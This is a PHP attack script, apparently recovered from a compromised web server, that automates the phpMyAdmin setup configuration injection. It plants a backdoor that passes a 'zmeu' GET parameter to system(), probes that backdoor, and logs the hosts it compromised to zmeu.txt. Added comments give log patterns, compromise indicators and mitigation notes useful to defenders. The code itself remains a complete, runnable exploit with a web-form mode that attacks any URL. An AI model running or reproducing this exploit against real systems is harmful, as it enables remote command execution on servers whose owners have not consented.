Current Path : /var/www/html/kamini/raz0r/
Current File : //var/www/html/kamini/raz0r/foo

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

// Defensive summary: this script automates an attack on the phpMyAdmin setup
// scripts of the host named in $adresa. It fetches a session cookie and token
// from setup/index.php, sends a request that carries a PHP snippet inside a
// _SESSION[ConfigFile][Servers][...] key together with session_to_unset, asks
// setup/config.php to save the configuration, and finally checks whether
// config/config.inc.php runs a command passed in the "zmeu" parameter.
//
// Log patterns worth alerting on: query strings containing both
// "session_to_unset" and "_SESSION[ConfigFile]", POSTs of "submit_save=Save"
// to setup/config.php, and any request to config/config.inc.php carrying a
// "zmeu=" parameter. A host that answered the last probe with "zzmmeeuu"
// should be treated as compromised and its config/config.inc.php inspected.
// NOTE(review): removing setup/ and the writable config/ directory after
// installation and keeping phpMyAdmin patched is the usual way to close this
// path; confirm against the vendor guidance for the deployed version.

// Target base URL: first CLI argument, or the "url" request parameter when the
// script is served by a web server. The web path accepts any URL unvalidated,
// so wherever this file is hosted it also relays requests to arbitrary hosts.
if(php_sapi_name()==='cli'){
	if(!isset($argv[1])){
		output("[+]Usage: ".$argv[0]." http://example.com/");
		afara();
	}
	$adresa = $argv[1];	
}else{
	$adresa = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
// Payload: PHP source that passes the value of a GET parameter named "zmeu"
// to system(), i.e. a command-execution backdoor. Finding this text in a
// phpMyAdmin configuration file is a compromise indicator.
$code = 'foreach($_GET as $k=>$v)if($k==="zmeu")system($v);';
$cookie = null;
$token  = null;
// Without the curl extension the script exits without printing a reason.
if(!function_exists('curl_init')){
	afara();
}
$ch     = curl_init();
// $debug is assigned here but never read in the visible code.
$debug  = 0;
// Web mode only: render the URL form, then stop unless the form was submitted.
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($adresa);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))afara(true);
}

// Request 1: GET setup/index.php with response headers included in the
// returned string so the session cookie can be read from it. The timeout is
// 4 seconds, and TLS certificate and hostname verification are both disabled.
curl_setopt_array($ch, array(
	CURLOPT_URL => $adresa.'/setup/index.php',
	CURLOPT_HEADER => 1,
	CURLOPT_RETURNTRANSFER => 1,
	CURLOPT_TIMEOUT => 4,
	CURLOPT_SSL_VERIFYPEER => false,
	CURLOPT_SSL_VERIFYHOST => false
));

// Give up on a 404, on an empty or failed response, or when the page contains
// 'Cannot load or save configuration' (presumably shown when the config
// directory is missing or not writable; TODO confirm).
$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
	afara();
}
if(!$result){
	afara();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
	afara();
}

// Pull the phpMyAdmin session cookie value and the 32-hex-digit token out of
// the response.
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
// Request 2: GET on the application root, reusing the cookie and token, with
// the URL-encoded payload placed inside the server key of a
// _SESSION[ConfigFile][Servers][...] parameter plus session_to_unset=x.
curl_setopt($ch, CURLOPT_URL, $adresa.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
if(!$result = curl_exec($ch)){
	afara();
}
// Request 3: POST submit_save=Save with the token to setup/config.php.
curl_setopt($ch, CURLOPT_URL, $adresa.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
if(!$result = curl_exec($ch)){
	afara();
}

// Request 4: verification probe. Switches back from POST and requests
// config/config.inc.php with zmeu=echo zzmmeeuu.
curl_setopt($ch, CURLOPT_URL, $adresa.'/config/config.inc.php?zmeu=echo%20zzmmeeuu');
curl_setopt($ch, CURLOPT_POST, 0);
if(!$result = curl_exec($ch)){
	afara();
}
// If the marker string comes back, print the resulting URL and append it to
// zmeu.txt in the current working directory (the fopen() result is not
// checked). A zmeu.txt found on a host is therefore a list of targets this
// tool flagged as compromised. Nothing is reported when the marker is absent.
if(preg_match('/zzmmeeuu/', $result)){
echo($adresa);
echo("/config/config.inc.php?zmeu=id");
echo("\n");
$fp = fopen('zmeu.txt', 'a+');
fwrite($fp, $adresa);
fwrite($fp, '/config/config.inc.php?zmeu=id');
fwrite($fp, "\n");
fclose($fp);
}else{
//
}


// Release the curl handle.
curl_close($ch);

/**
 * Print a message followed by a newline and flush it to the client.
 *
 * Under any SAPI other than the CLI the text is HTML-escaped (quotes
 * included) before printing; under the CLI it is printed unchanged.
 *
 * @param mixed $msg Text to print.
 * @return void
 */
function output($msg){
	$line = "$msg\n";
	if(php_sapi_name()!=='cli'){
		// Browser output: neutralise markup so the message cannot inject HTML.
		$line = htmlspecialchars($line,ENT_QUOTES);
	}
	echo $line;
	flush();
}

/**
 * Terminate the script.
 *
 * In non-CLI mode an opening <pre> tag is written first; in CLI mode nothing
 * is printed. Any arguments passed by callers are ignored.
 *
 * @return void This function does not return; execution stops here.
 */
function afara(){
	if(php_sapi_name()!=='cli'){
		echo '<pre>';
	}
	exit();
}

// Last output in non-CLI mode is another opening <pre> tag; the script never
// emits a closing </pre> after the one opened in the form template.
echo php_sapi_name()!=='cli'?'<pre>':'';?>